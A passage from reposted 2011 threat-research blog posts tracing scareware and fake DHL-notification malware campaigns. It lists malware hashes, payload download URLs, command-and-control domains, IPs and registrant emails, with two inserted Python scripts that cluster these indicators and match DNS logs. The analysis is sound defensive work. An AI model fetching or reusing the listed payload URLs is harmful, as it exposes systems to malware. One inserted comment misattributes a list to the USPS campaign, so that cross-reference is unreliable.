responding to 84.123.115.228 (AS6739; ONO-AS Cableuropa - ONO): 

defender-thga.in - Email: youngantonio6055@gmail.com 
defender-wqga.in - Email: christodoulosglidden8856@gmail.com 
defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-rlob.in - Email: vasikaranfreudenburg2690@gmail.com 
defender-abcc.in - Email: rubysmart5057@gmail.com 
defender-pakc.in - Email: sabrinawheelock7642@gmail.com 
defender-keod.in - Email: khashayarbirss4814@gmail.com 
defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-qumf.in - Email: rachelalba1891@gmail.com 
defender-fmof.in - Email: kamillamartin1237@gmail.com 
defender-uvag.in - Email: espenkeck7682@gmail.com 
defender-hsug.in - Email: moniquetkarnopp3596@gmail.com 
defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-lcoh.in - Email: timothythomas6924@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-wbui.in - Email: carlosbuntschu1238@gmail.com 
defender-vlmj.in - Email: lauriefreeman9930@gmail.com 
defender-hjlk.in - Email: lauriefreeman9930@gmail.com 
defender-endl.in - Email: adamgaylard1113@gmail.com 
defender-jgnl.in - Email: caseyalzen3316@gmail.com 
defender-iksl.in - Email: amarasanders9974@gmail.com 
defender-labm.in - Email: gregorybradford1520@gmail.com 
defender-rrin.in - Email: kevincharoenset5321@gmail.com 
defender-sxin.in - Email: taloupavlinovich7166@gmail.com 
defender-cron.in - Email: lisasuresh9147@gmail.com 
defender-vqqn.in - Email: chrisjames4421@gmail.com 
defender-dteo.in - Email: giovannaraggio5417@gmail.com 
defender-uqko.in - Email: christinakaaikati5574@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 
defender-atxo.in - Email: celinelebba9266@gmail.com 
defender-rlfp.in - Email: latanyamuscatell9507@gmail.com 
defender-vflq.in - Email: terriacuna2081@gmail.com 
defender-eklq.in - Email: sebastiensheppard8680@gmail.com 
defender-ddbr.in - Email: selenajohansson9195@gmail.com 
defender-ojbr.in - Email: fucknielsen8675@gmail.com 
defender-drnr.in - Email: sumanvcasquez2008@gmail.com 
defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
defender-hmfu.in - Email: lynnbone8026@gmail.com 
defender-htlu.in - Email: jerihamann4163@gmail.com 
defender-aabv.in - Email: leonflanagan7681@gmail.com 
defender-ppdw.in - Email: divinakempton5670@gmail.com 
defender-wrhw.in - Email: bradsuresh1406@gmail.com 
defender-wkiw.in - Email: otisvaladez7778@gmail.com 
defender-hipw.in - Email: angiejohansen9730@gmail.com 
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com 
defender-xnnx.in - Email: sylviawulff2140@gmail.com 
defender-xkox.in - Email: ryanmartin7607@gmail.com 

The scareware domains have been registered using 
automatically registered email accounts at Gmail, a 
precaution meant to make it harder to expose the whole 
campaign by pivoting on a single registrant email. 

Monitoring of the campaign is ongoing. 
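The pivot the post relies on, grouping the listed domains by the IP they respond to and by registrant email, as an added example that is not code from the post. It serves both the observation above that the campaign's domains share IPs and the note that the scareware domains each carry their own throwaway Gmail address: the record lines are copied from the post's own lists (with the parsing of that "domain - IP - Email:" shape and the clustering functions being this example's assumptions), and the output shows which registrants are a usable pivot (tik0066@gmail.com, jamesnorthone@hotmailbox.com) and which are single-use.

```python
"""Pivot campaign IoCs on shared infrastructure (added example, not from the post)."""
import re
from collections import defaultdict

# Constructed input: a handful of record lines copied from the post's lists, in the
# "domain[/path] [(N results)] [- IP (ASN); ...] [- Email: address]" shape used there.
SAMPLE_RECORDS = """
online-stats201.info/ur.php - Email: tik0066@gmail.com
agasi-story.info/ur.php - 91.217.162.45 - Email: tik0066@gmail.com
eva-marine.info/ur.php - 109.236.81.28 - Email: tik0066@gmail.com
lizamoon.com/ur.php (67,500 results) - 91.220.35.151 (AS3721); 91.213.29.182 (AS51786); 95.64.9.18 (AS50244) - Email: jamesnorthone@hotmailbox.com
alisa-carter.com/ur.php (220,000 results) - Email: jamesnorthone@hotmailbox.com
defender-nibea.in/scanlb/237 - 46.252.130.200 - Email: jimwei2969@gmail.com
defender-aabv.in - Email: leonflanagan7681@gmail.com
defender-atio.in - Email: terriduverger3239@gmail.com
antivirus-1091.co.cc
"""

DOMAIN_RE = re.compile(r"^([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"Email:\s*(\S+@\S+)")


def parse_record(line):
    """Return {'domain', 'ips', 'email'} for one record line, or None if it has no domain."""
    line = line.strip()
    match = DOMAIN_RE.match(line)
    if not match:
        return None
    rest = line[match.end():]
    email = EMAIL_RE.search(rest)
    # IPs sit between the domain and the 'Email:' field; ASN tags such as (AS3721)
    # and result counts such as 67,500 do not match the dotted-quad pattern.
    ips = IPV4_RE.findall(rest.split("Email:")[0])
    return {
        "domain": match.group(1).lower(),
        "ips": ips,
        "email": email.group(1).lower() if email else None,
    }


def parse_records(text):
    return [rec for rec in (parse_record(l) for l in text.splitlines()) if rec]


def cluster_by_email(records):
    """Registrant email -> domains registered with it, in order of appearance."""
    clusters = defaultdict(list)
    for rec in records:
        if rec["email"]:
            clusters[rec["email"]].append(rec["domain"])
    return dict(clusters)


def cluster_by_ip(records):
    """IP -> domains the records list as responding to it."""
    clusters = defaultdict(list)
    for rec in records:
        for ip in rec["ips"]:
            clusters[ip].append(rec["domain"])
    return dict(clusters)


def registrant_reuse(records):
    """Split registrants into reused ones (two or more domains, a pivot that exposes
    more of the campaign) and single-use ones (the throwaway-account pattern)."""
    by_email = cluster_by_email(records)
    reused = {e: len(d) for e, d in by_email.items() if len(d) >= 2}
    single_use = sorted(e for e, d in by_email.items() if len(d) == 1)
    return reused, single_use


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for ip, domains in cluster_by_ip(recs).items():
        print(f"{ip}: {', '.join(domains)}")
    reused, single_use = registrant_reuse(recs)
    print("reused registrants:", reused)
    print("single-use registrants:", single_use)
```

Feeding the post's full lists through the same functions is a matter of pasting them into SAMPLE_RECORDS; the IP clusters then reproduce the 46.252.130.200 and 84.123.115.228 groupings the post spells out by hand.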

Related posts: 

• [6]SQL Injection Through Search Engines Reconnaissance 
• [7]Massive SQL Injections Through Search Engine's Reconnaissance - Part Two 
• [8]Massive SQL Injection Attacks - the Chinese Way 
• [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 
• [10]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware 
• [11]Dissecting the WordPress Blogs Compromise at Network Solutions 
• [12]Yet Another Massive SQL Injection Spotted in the Wild 
• [13]Smells Like a Copycat SQL Injection In the Wild 
• [14]Fast-Fluxing SQL Injection Attacks 
• [15]Obfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [16]Dancho Danchev's blog. 

1. http://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks-chinese.html 
2. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html 
3. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html 
4. http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx 
5. http://www.virustotal.com/file-scan/report.html?id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c-1301586582 
6. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html 
7. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html 
8. http://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks-chinese.html 
9. http://ddanchev.blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.html 
10. http://ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.html 
11. http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html 
12. http://ddanchev.blogspot.com/2008/05/yet-another-massive-sql-injection.html 
13. http://ddanchev.blogspot.com/2008/07/smells-like-copycat-sql-injection-in.html 
14. http://ddanchev.blogspot.com/2008/05/fast-fluxing-sql-injection-attacks.html 
15. http://ddanchev.blogspot.com/2008/07/obfuscating-fast-fluxed-sql-injected.html 
16. http://ddanchev.blogspot.com/ 
Spamvertised DHL Notifications Scareware Campaign 
(2011-04-04 16:44) 

Yet another currently spamvertised campaign is 
impersonating DHL for scareware serving purposes. 

Sample subjects: DHL notification #random number 

Sample message: Dear customer! The parcel was send 
your home address. And it will arrice within 7 bussness day. 
More information and the tracking number are attached in 
document below. Thank you. 2011 DHL International 
GmbH. All rights reserverd. 

Sample filenames: DHL_tracking.zip; doc.zip; dhl.zip 

Detection rates: 

dhl.exe - [1]Backdoor:Win32/Hostil.gen!A - Result: 22/40 (55.0 %) 
MD5: 87d778169ae14d934b92ce628b5cfde4 
SHA1: 20787fde3b7fde64cc3892c4df9a4eb2a2515830 
SHA256: 6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a760f4eb983d76007d3fe54 

Downloads additional binary from puskovayaustanovka.ru/pusk2.exe - 46.161.20.66 - Email: admin@puskovayaustanovka.ru 

pusk2.exe - [2]Trojan.Fakealert.20509 - Result: 11/41 (26.8 %) 
MD5: a9be091eedea947f8626d11042e0d9be 
SHA1: 9c1d399d47a6ef6081553a101ab48fca61859db4 
SHA256: d4f5802a392c0851d5e19118d56cc8b578f1a07085aa5772cbdcf484608ed094 
Upon execution, it phones back to the following domains: 

kynugypenihyf.com - Email: v8@ca4.ru 
cylakydugudi.com - Email: acts@free-id.ru 
fevahanybyvu.com - Email: fs@free-id.ru 
gicyxepomer.com - Email: tabs@yourisp.ru 
bemojewedowigo.com - Email: fs@free-id.ru 
sakafiduzipame.com - Email: build@ca4.ru 
wetotyger.com - Email: acts@free-id.ru 
kytevaviqopoci.com - Email: fs@free-id.ru 
wamojafadezy.com - Email: kilt@bz3.ru 
tetagyjaj.com - Email: kilt@bz3.ru 
jerakidukojoz.com - Email: wrap@cheapbox.ru 
cixovatywo.com - Email: frenzy@ca4.ru 
jafybobik.com - Email: force@ca4.ru 
nizokatahinery.com - Email: foxy@cheapbox.ru 
cujicaraso.com - Email: beret@ca4.ru 
zuzosahule.com - Email: only@free-id.ru 
gokuzajylot.com - Email: silks@ca4.ru 
jumonevetode.com - Email: silks@ca4.ru 
dafatesomyz.com - Email: zq@bz3.ru 
lukofymela.com - Email: silks@ca4.ru 
jebuponip.com - Email: lost@free-id.ru 
quxovasuced.com - Email: hp@ppmail.ru 
laqoduhisegu.com - Email: shot@bz3.ru 
xyseditacif.com - Email: hart@free-id.ru 
wylyxaqunowy.com - Email: mows@bz3.ru 
qepovexidysopy.com - Email: byob@yourisp.ru 
bebecebyt.com - Email: mows@bz3.ru 
dihemehypuq.com - Email: shot@bz3.ru 
rumesexyzobuz.com - Email: dawn@bz3.ru 
gopilezavyxiro.com - Email: hush@bz3.ru 
hyvijinymut.com/1017000312 - 99.198.114.189 - returns OK 

Domains are responding to the following ASs: AS18866; AS32097: 

quxovasuced.com - 69.50.209.139 
laqoduhisegu.com - 69.50.209.140 
wylyxaqunowy.com - 69.50.209.148 
qepovexidysopy.com - 69.50.209.149 
fevahanybyvu.com - 69.50.209.182 
bemojewedowigo.com - 69.50.209.183 
gicyxepomer.com - 69.50.209.184 
sakafiduzipame.com - 69.50.209.185 
wamojafadezy.com - 69.50.209.186 
kytevaviqopoci.com - 69.50.209.188 
jebuponip.com - 69.50.209.223 
cylakydugudi.com - 69.50.209.224 
wetotyger.com - 69.50.209.225 
nizokatahinery.com - 69.197.161.202 
cujicaraso.com - 69.197.161.203 
kynugypenihyf.com - 69.197.161.204 
jafybobik.com - 69.197.161.205 
tetagyjaj.com - 99.198.114.98 
jerakidukojoz.com - 99.198.114.99 
gopilezavyxiro.com - 99.198.114.100 
cixovatywo.com - 99.198.114.101 
hyvijinymut.com - 99.198.114.189 
zuzosahule.com - 204.12.223.170 
jumonevetode.com - 204.12.223.171 
dafatesomyz.com - 204.12.223.172 
gokuzajylot.com - 204.12.223.173 
lukofymela.com - 204.12.223.174 
rumesexyzobuz.com - 204.12.223.186 
xyseditacif.com - 204.12.223.187 
dihemehypuq.com - 204.12.223.188 
bebecebyt.com - 204.12.223.189 
Monitoring of the campaign is ongoing. 

Related posts: 

[3] Spamvertised Post Office Express Mail (USPS) 
Emails Serving Malware 

[4] Spamvertised United Parcel Service notifications 
serve malware 

[5] Spamvertised FedEx Notifications Spread Malware

[6] Spamvertised DHL Notification Malware Campaign 

[7] More Spamvertised DHL Notifications Spread 
Malware 


1. http://www.virustotal.com/file-scan/report.html?id=6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a760f4eb983d76007d3fe54-1301924841

2. http://www.virustotal.com/file-scan/report.html?id=d4f5802a392c0851d5e19118d56cc8b578f1a07085aa5772cbdcf484608ed094-1301925356

3. http://ddanchev.blogspot.com/2011/03/spamvertised-post-office-express-mail.html

4. http://ddanchev.blogspot.com/2011/03/spamvertised-united-parcel-service.html

5. http://ddanchev.blogspot.com/2011/03/spamvertised-fedex-notifications-spread.html

6. http://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notifidcation-malware.html

7. http://ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.html
Summarizing Zero Day's Posts for March (2011-04-04 18:56)

The following is a brief summary of all of my posts at ZDNet's Zero Day for March. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

Recommended reading: 

• [3] Dear ISP, it's time to quarantine your malware-infected 
customers 

• [4] Zombie PC Prevention Bill to make security software 
mandatory 
01. [5]Spamvertised 'You have received a gift from one of our members!' malware campaign

02. [6]Report: malicious PDF files becoming the attack vector of choice

03. [7]Ashton Kutcher's Twitter account hacked

04. [8]Google tops comparative review of malicious search results - again

05. [9]Report: 3 million malvertising impressions served per day

06. [10]Dear ISP, it's time to quarantine your malware-infected customers

07. [11]SpyEye gets new DDoS functionality

08. [12]Spamvertised DHL notifications lead to malware

09. [13]Spamvertised FedEx notifications lead to malware

10. [14]Rustock botnet's operations disrupted

11. [15]Malicious Japan quake spam leads to scareware

12. [16]Spamvertised United Parcel Service notifications lead to malware

13. [17]Researchers release details on 34 SCADA vulnerabilities

14. [18]Zombie PC Prevention Bill to make security software mandatory

15. [19]Spamvertised Post Office Express Mail (USPS) emails lead to malware

16. [20]New GpCode ransomware encrypts files, demands $125 for decryption

17. [21]Mass SQL injection attack leads to scareware

This post has been reproduced from [22]Dancho Danchev's blog. Follow him [23]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin;content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/dear-isp-its-time-to-quarantine-your-malware-infected-customers/6712

4. http://www.zdnet.com/blog/security/zombie-pc-prevention-bill-to-make-security-software-mandatory/8487

5. http://www.zdnet.com/blog/security/spamvertised-you-have-received-a-gift-from-one-of-our-members-malware-campaign/8250

6. http://www.zdnet.com/blog/security/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/8255

7. http://www.zdnet.com/blog/security/ashton-kutchers-twitter-account-hacked/8280

8. http://www.zdnet.com/blog/security/google-tops-comparative-review-of-malicious-search-results-again/8306

9. http://www.zdnet.com/blog/security/report-3-million-malvertising-impressions-served-per-day/8319

10. http://www.zdnet.com/blog/security/dear-isp-its-time-to-quarantine-your-malware-infected-customers/6712

11. http://www.zdnet.com/blog/security/spyeye-gets-new-ddos-functionality/8381

12. http://www.zdnet.com/blog/security/spamvertised-dhl-notifications-lead-to-malware/8415

13. http://www.zdnet.com/blog/security/spamvertised-fedex-notifications-lead-to-malware/8452

14. http://www.zdnet.com/blog/security/rustock-botnets-operations-disrupted/8456

15. http://www.zdnet.com/blog/security/malicious-japan-quake-spam-leads-to-scareware/8463

16. http://www.zdnet.com/blog/security/spamvertised-united-parcel-service-notifications-lead-to-malware/8478

17. http://www.zdnet.com/blog/security/researchers-release-details-on-34-scada-vulnerabilities/8483

18. http://www.zdnet.com/blog/security/zombie-pc-prevention-bill-to-make-security-software-mandatory/8487

19. http://www.zdnet.com/blog/security/spamvertised-post-office-express-mail-usps-emails-lead-to-malware/8502

20. http://www.zdnet.com/blog/security/new-gpcode-ransomware-encrypts-files-demands-125-for-decryption/8505

21. http://www.zdnet.com/blog/security/mass-sql-injection-attack-leads-to-scareware/8510

22. http://ddanchev.blogspot.com/

23. http://twitter.com/danchodanchev
Don't Play Poker on an Infected Table - Part Four (2011-04-11 18:10)

A currently spamvertised campaign is enticing users into downloading and executing a fraudulent online gambling application known as VegasVIP_setup.exe.

Detection rate:

VegasVIP_setup.exe - [1]Win32/CazinoSilver - Result: 16/42 (38.1 %)

MD5: 8680fa2868dd068f3c1d3995df105243

SHA1: 4f3ecd72c223cf6e130377a3ecd9149232dc848b

SHA256: 68ded50bf7c9b7f6961e6334b25fdad5d2369e461051d5a9fa1f1ebaadeb1d0e


Upon execution, the sample phones back to:

www.onlinevegas.com/download/update.php?dl=0af374526b7b6eb6c54bf92cb1d1a236&status=10

The spammers are earning revenue by participating in the BestCasinoPartner.com Affiliate Program. More details:

"Turn Your Traffic Into BIG Monthly Cash! Join the BestCasinoPartner.com Affiliate Program and from the very start you will earn a HUGE 30 % of ALL player GROSS losses EVERY month, no matter what your volume is! That's ALL player GROSS losses for the life of your referred players, with No Loss Carry-Forward!

Refer an Affiliate: Get Even More. Earn 7 % override on the Casino Gross Revenue payment made to the referred Affiliate for all players referred by your directly referred Affiliates - for the life of the player! Earn 5 % override on the Casino Gross Revenue payment made from your Web masters' referrals! AND... we even go One Step Further — a THIRD tier!

Here are the THREE levels that will earn you profits for the life EACH player:

• Tier 1: 7 % override on the Casino Gross Revenue
• Tier 2: 5 % override on the Casino Gross Revenue
• Tier 3: 3 % override on the Casino Gross Revenue"

Participating affiliate domains are: OnlineVegas.com; GoCasino.com; CrazySlots.com and GrandVegas.com

Related fraudulent online gambling domains part of the 
campaign: 

777fashionplays.ru
777playsfashion.ru
bankpremiumplays.ru
bank-premium-plays.ru
bestfortuneplays.ru
best-fortune-plays.ru
bestplaysfortune.ru
best-plays-fortune.ru
bingobonusplays.ru
bonus-bingo-plays.ru
bonusplaysbingo.ru
bonus-plays-bingo.ru
class-plays-world.ru
class-world-plays.ru
crazyplaysroulette.ru
crazy-plays-roulette.ru
crazyrouletteplays.ru
crazy-roulette-plays.ru
elit-grand-games.ru
elit-plays-king.ru
fashion-plays-vegas.ru
fashion-vegas-plays.ru
fiveplaysstar.ru
fortunebestplays.ru
fortune-best-plays.ru
fortuneplaysbest.ru
fortune-plays-best.ru
fortune-plays-land.ru
fortuneplaysparty.ru
fortune-plays-party.ru
games-elit-king.ru
games-king-elit.ru
gamespremiumbank.ru
jokerplaysvegas.ru
online-games-luxory.ru
palaceplayscrystal.ru
playsbankpremium.ru
plays-bank-premium.ru
playsbestfortune.ru
plays-best-fortune.ru
plays-bingo-bonus.ru
playsbonusbingo.ru
plays-bonus-bingo.ru
playsclassworld.ru
playscrazyroulette.ru
plays-crazy-roulette.ru
playscrystalpalace.ru
plays-crystal-palace.ru
playsfashion777.ru
playsfivestar.ru
playsfortunebest.ru
plays-fortune-party.ru
playsonlineextra.ru
plays-plaza-west.ru
playspremiumbank.ru
playsroulettecrazy.ru
plays-roulette-crazy.ru
plays-royal-classic.ru
plays-star-five.ru
playsvegasjoker.ru
playswestplaza.ru
plays-world-win.ru
plaza-plays-west.ru
plazawestplays.ru
plaza-west-plays.ru
premium-bank-plays.ru
premiumplaysbank.ru
roulette-crazy-plays.ru
starfiveplays.ru
star-five-plays.ru
starplaysfive.ru
vegas-fashion-plays.ru
vegasjokergames.ru
vegasjokerplays.ru
vegas-joker-plays.ru
vegas-plays-joker.ru
westplaysplaza.ru
west-plays-plaza.ru
westplazaplays.ru
west-plaza-plays.ru
win-plays-world.ru
winworldplays.ru
win-world-plays.ru
world-class-plays.ru
world-plays-class.ru

Related posts: 

[2] Don't Play Poker on an Infected Table - Part Three 

[3] Don't Play Poker on an Infected Table - Part Two 

[4] Don't Play Poker on an Infected Table 

This post has been reproduced from [5]Dancho Danchev's blog. Follow him [6]on Twitter.


1. http://www.virustotal.com/file-scan/report.html?id=68ded50bf7c9b7f6961e6334b25fdad5d2369e461051d5a9fa1f1ebaadeb1d0e-1302535749

2. http://ddanchev.blogspot.com/2010/03/dont-play-poker-on-infected-table-part.html

3. http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html

4. http://ddanchev.blogspot.com/2007/09/dont-play-poker-on-infected-table.html

5. http://ddanchev.blogspot.com/

6. http://twitter.com/danchodanchev
Spamvertised "Reqest Rejected" Campaign Serving Scareware (2011-04-12 20:22)

A currently spamvertised scareware-serving campaign is enticing end users into downloading and executing a malicious binary, which drops a scareware variant.

Sample subject: Reqest rejected 

Sample message: " Dear Sirs, Thank you for your letter! 
Unfortunately we can not confirm your request! More 
information attached in document below. Thank you Best 
regards. " 

Sample attachments: EX-38463.pdf.zip; EX-38463.pdf.exe

Detection rate:

EX-38463.pdf.exe - [1]TrojanDownloader:Win32/Chepvil.J - Result: 11/41 (26.8 %)

MD5: 5085794e6c283ebcfa3878805b9e7be7

SHA1: 1fbd8d3b0a3479274d8f09543452bf724bcb245c

SHA256: c03711dbafae9b296daed8720f997d84caa5e5a5407a689926050a061d67b932

Upon execution downloads hdjfskh.net/pusk.exe - 208.43.90.48 - Email: admin@firtryt.biz

Detection rate:

pusk.exe - [2]FakeAlert-CN.gen.aa - Result: 13/42 (31.0 %)

MD5: a50a91176b5aeb96b8b77b99d587c485

SHA1: c56b7ab2123dbd49902446ffcc0cf59d6a865857

SHA256: c912a975e3c2fc911d6550d86e8fd89dbd30e3d1e07d788b45aac0d6cf61e83c
Upon execution phones back to the following domains and ASs:

Phones back to: AS19875; AS8001; AS24940; AS32475; AS32097; AS19875


bemojewedowigo.com - 78.46.105.205
bemolaqijicy.com - 99.198.114.206 - Email: vista@free-id.ru
ceiisesuho.com - 99.198.114.202 - Email: hush@bz3.ru
cixovatywo.com - 78.46.105.205 - Email: frenzy@ca4.ru
fytypoqywu.com - 64.46.38.94 - Email: fy4371215910301@domainidshield.com
gicyxepomer.com - 78.46.105.205 - Email: tabs@yourisp.ru
gopilezavyxiro.com - 78.46.105.205 - Email: hush@bz3.ru
hivanedak.com - 188.95.54.242 - Email: steps@ppmail.ru
hotilosire.com - 208.110.67.122 - Email: lathe@maillife.ru
jerakidukojoz.com - 78.46.105.205 - Email: wrap@cheapbox.ru
kupeqobujohaq.com - 64.46.38.145 - Email: soup@fastermail.ru
kytevaviqopoci.com - 78.46.105.205 - Email: fs@free-id.ru
pikilokykizanu.com - 65.254.54.77 - Email: dawn@free-id.ru
punajytapaci.com - 209.97.213.105 - Email: mire@maillife.ru
qisacugugu.com - 64.46.38.129 - Email: as@free-id.ru
qupajubica.com - 78.46.105.205 - Email: heard@bz3.ru
reruravobosila.com - 67.196.13.96 - Email: mon@ppmail.ru
rorodarof.com - 99.198.114.204 - Email: hush@bz3.ru
ruqydahec.com - 67.196.13.97 - Email: mon@ppmail.ru
sakafiduzipame.com - 78.46.105.205 - Email: build@ca4.ru
sykobodyducib.com - 208.110.67.102 - Email: lathe@maillife.ru
tetagyjaj.com - 78.46.105.205 - Email: kilt@bz3.ru
tibehewuk.com - 209.97.213.102 - Email: mon@ppmail.ru
tisatosyhimidy.com - 188.95.54.243 - Email: jan@free-id.ru
tyhiqymiwufuj.com - 208.110.67.121 - Email: dawn@free-id.ru
vakyditefo.com - 99.198.114.203 - Email: vista@free-id.ru
wamojafadezy.com - 78.46.105.205 - Email: acts@free-id.ru
wetotyger.com - 78.46.105.205 - Email: acts@free-id.ru
wixecyhobovy.com - 64.46.38.130 - Email: soup@fastermail.ru
wolycunanoqe.com - 72.9.233.98 - Email: lathe@maillife.ru
zajatimibuj.com - 208.110.67.119 - Email: bark@cheapbox.ru
zequcitamado.com - 99.198.114.205 - Email: vista@free-id.ru

punajytapaci.com/1017000412 - 209.97.213.105 - Email: mire@maillife.ru
tibehewuk.com/1017000412 - 209.97.213.102 - Email: mon@ppmail.ru

Monitoring of the campaign is ongoing. 
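The domain/IP/registrant lists in this post and in the USPS-themed one above are what an analyst pivots on: the same registrant e-mail or the same hosting IP appearing across two campaigns is the evidence that ties them to one operator, and the domains themselves feed a DNS blocklist. The following is an added example, written for this page and not the author's tooling, that parses lines in the post's "domain - IP - Email: registrant" format, groups hosts by IP, registrant and /24, and checks constructed BIND-style DNS query log lines against the resulting list. The indicator lines are quoted from the campaign lists above; the DNS log lines, the `LINE_RE` and `DNS_QUERY_RE` patterns and all function names are this example's own.

```python
"""Parse the "domain - IP - Email: registrant" indicator lines used in these
posts, pivot on shared hosting/registrant data, and check a DNS log against
the resulting blocklist.  Added example, not the author's tooling."""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# One indicator line: host, optional URL path, IPv4, optional registrant e-mail.
# Spacing around the dashes and the presence of the e-mail vary between lines.
LINE_RE = re.compile(
    r"^\s*(?P<host>[A-Za-z0-9][A-Za-z0-9.-]*)(?P<path>/\S*)?"
    r"\s*-\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
    r"(?:\s*-\s*Email:\s*(?P<email>\S+))?"
)

# Indicator lines quoted from the campaign write-ups above (one with the dash
# run into the IP, as happens in extracted copies), plus prose the parser
# must ignore.
SAMPLE_LINES = """\
Upon execution phones back to the following domains and ASs:
Phones back to : AS19875; AS8001; AS24940; AS32475; AS32097; AS19875
cixovatywo.com - 78.46.105.205 - Email: frenzy@ca4.ru
gicyxepomer.com - 78.46.105.205 - Email: tabs@yourisp.ru
gopilezavyxiro.com - 78.46.105.205 - Email: hush@bz3.ru
rorodarof.com - 99.198.114.204 - Email: hush@bz3.ru
hivanedak.com -188.95.54.242 - Email: steps@ppmail.ru
tetagyjaj.com - 78.46.105.205 - Email: kilt@bz3.ru
hyvijinymut.com/1017000312 - 99.198.114.189 - returns OK
Monitoring of the campaign is ongoing.
"""


def parse_indicator(line):
    """Return {host, path, ip, email} for an indicator line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    try:
        ip = str(ip_address(m.group("ip")))  # rejects octets above 255
    except ValueError:
        return None
    email = m.group("email")
    return {
        "host": m.group("host").lower().rstrip("."),
        "path": m.group("path") or "",
        "ip": ip,
        "email": email.lower() if email else None,
    }


def parse_indicators(text):
    return [r for r in map(parse_indicator, text.splitlines()) if r]


def pivot(records):
    """Group hosts by resolved IP, by registrant e-mail and by /24 netblock;
    shared values are how the posts tie separate campaigns to one operator."""
    by_ip, by_email, by_net = defaultdict(set), defaultdict(set), defaultdict(set)
    for r in records:
        by_ip[r["ip"]].add(r["host"])
        if r["email"]:
            by_email[r["email"]].add(r["host"])
        by_net[str(ip_network(r["ip"] + "/24", strict=False))].add(r["host"])
    return by_ip, by_email, by_net


def shared_infrastructure(records, min_hosts=2):
    """(kind, key, sorted hosts) for every IP, e-mail or /24 shared by >= min_hosts hosts."""
    by_ip, by_email, by_net = pivot(records)
    out = []
    for kind, groups in (("ip", by_ip), ("email", by_email), ("net", by_net)):
        for key, hosts in groups.items():
            if len(hosts) >= min_hosts:
                out.append((kind, key, sorted(hosts)))
    return sorted(out, key=lambda t: (-len(t[2]), t[0], t[1]))


def blocklist(records):
    """Unique hostnames, e.g. for a DNS sinkhole or proxy deny list."""
    return sorted({r["host"] for r in records})


# Constructed DNS query log lines (BIND-style "client IP#port: query: NAME IN A").
SAMPLE_DNS_LOG = """\
client 10.0.0.15#49231: query: gopilezavyxiro.com IN A
client 10.0.0.22#51002: query: www.example.org IN A
client 10.0.0.15#49240: query: HIVANEDAK.COM IN A
"""

DNS_QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<name>\S+) IN")


def match_dns_log(records, log_text):
    """Return (client, queried name) for each log line whose name is on the blocklist."""
    listed = set(blocklist(records))
    hits = []
    for line in log_text.splitlines():
        m = DNS_QUERY_RE.search(line)
        if m and m.group("name").lower().rstrip(".") in listed:
            hits.append((m.group("client"), m.group("name").lower()))
    return hits


if __name__ == "__main__":
    recs = parse_indicators(SAMPLE_LINES)
    for kind, key, hosts in shared_infrastructure(recs):
        print(f"{kind:5} {key:20} {len(hosts)} hosts: {', '.join(hosts)}")
    print("DNS hits:", match_dns_log(recs, SAMPLE_DNS_LOG))
```

Run on the sample, the report puts 78.46.105.205 first with four hosts, which is exactly the overlap the post relies on: that address also carries domains from the "Successfull Order" campaign below, and hush@bz3.ru registered domains in both this list and the USPS one. Feeding a resolver's query log through `match_dns_log` turns the same list into a detection.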

This post has been reproduced from [3]Dancho Danchev's 
blog. Follow him [4]on Twitter. 

1. http://www.virustotal.com/file-scan/report.html?id=c03711dbafae9b296daed8720f997d84caa5e5a5407a689926050a061d67b932-1302627694

2. http://www.virustotal.com/file-scan/report.html?id=c912a975e3c2fc911d6550d86e8fd89dbd30e3d1e07d788b45aac0d6cf61e83c-1302627443

3. http://ddanchev.blogspot.com/

4. http://twitter.com/danchodanchev
Spamvertised "Successfull Order 977132" Leads to Scareware (2011-04-28 14:50)

A currently ongoing malware campaign is impersonating Bobijou Inc for malware-serving purposes.

Sample subject: "Successfull Order 977132"

Sample message: " Thank you for ordering from Bobijou 
Inc. This message is to inform you that your order has been 
received and is currently being processed. 

Your order reference is 901802. You will need this in all 
correspondence. This receipt is NOT proof of purchase. 

We will send a printed invoice by mail to your billing address. 

You have chosen to pay by credit card. Your card will be 
charged for the amount of 262.00 USD and "Bobijou 

